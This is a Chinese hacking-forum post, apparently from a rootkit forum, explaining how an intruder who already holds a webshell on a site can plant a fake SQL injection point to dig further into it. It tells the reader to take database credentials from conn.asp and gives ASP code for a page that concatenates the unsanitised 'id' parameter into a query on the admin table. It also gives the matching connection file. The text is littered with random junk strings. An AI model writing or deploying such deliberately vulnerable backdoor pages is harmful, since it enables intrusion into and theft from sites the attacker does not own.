自己构造注入点方便入侵/ u; ~7 h8 v4 f3 X% d
/ N6 d) ^0 Y2 A( Q1 b# X) y, H5 v今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息( i: O" {8 g n* O8 t
' H/ E/ G3 J: B! B4 L- {* u, e这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
. D! S+ i9 L8 a/ k3 m V/ ]4 D5 G& X% e& _6 N7 z# n6 f
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和* O2 S5 r2 i2 A8 W" Q( T& w
+ l. q! Y0 a4 }+ z& K
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
8 ]* C, |6 e9 A0 A( J! A' R7 e. ~: b& X/ J( p
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:7 m# b) g* q: Q. A% d+ d
W7 t1 b8 j6 T1 P程序代码5 h" p: g8 v, K% a8 r$ w
<!--#include file="xx.asp"-->2 k& x+ K! d, |2 I3 J
<%
5 n$ Q5 T/ o6 Q: c6 w1 j0 tset rs=server.createobject("ADODB.recordset")
9 Y* B: k( w/ Q: n4 B _4 t( z8 \id = request("id")+ E: N( p- c- |# l# S
strSQL = "select * from admin where id=" & id6 n5 n4 j8 ^, m" \+ y2 h# c
rs.open strSQL,conn,1,3
3 Y3 i3 t6 {0 a2 u9 w/ srs.close
1 ~6 d# i% ?) G5 \$ A) w& e0 d%>
# T- e( a% i( a" |/ v) E- F3 l/ A$ A8 f% B$ K! h) U
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
4 S4 s6 z" [+ m' y) B0 b) e9 p. ^+ J
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!3 u; I4 X) o r$ q- c* ?
' ]5 d9 r+ u- i然后就要构造一个连接数据库的文件了,代码如下:
: V$ T7 r6 G/ t, Z4 d* {6 x9 E程序代码
: ?, z2 _0 D1 ~<% 0 N7 n( P/ Q; {: M
strSQLServerName = "000.000.000.000" '服务器名称或地址
- j/ T: V$ j4 K8 s4 p; WstrSQLDBUserName = "sqlname" '数据库帐号
& |! Z8 Q X2 dstrSQLDBPassword = "sqlpass" '数据库密码) @: e( B& a5 k( d' Q
strSQLDBName = "sqldataname" '数据库名称
0 o8 _* d9 p2 O, j3 GSet conn = Server.CreateObject("ADODB.Connection")
' [, Z) F3 U* S7 B( E* |" dstrCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
. F6 B( p0 e7 ^0 T% I" ~ q# Wconn.open strCon
J8 f' m r5 D/ w%>
8 u8 }4 g8 B( ~) V
/ H6 l7 u: m$ T, i6 a+ ~3 N8 E8 z这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话, c* U. J1 D1 D
2 y: {9 Y/ o7 C. J6 L$ [4 X) k2 t+ l
就这样,正常情况下,就OK了,伪造成功……
2 H1 R0 _" a9 @0 J7 b/ W" C7 N3 ~" U9 K s$ I, b
如果有什么问题可以提出来大家一起探讨解决。 |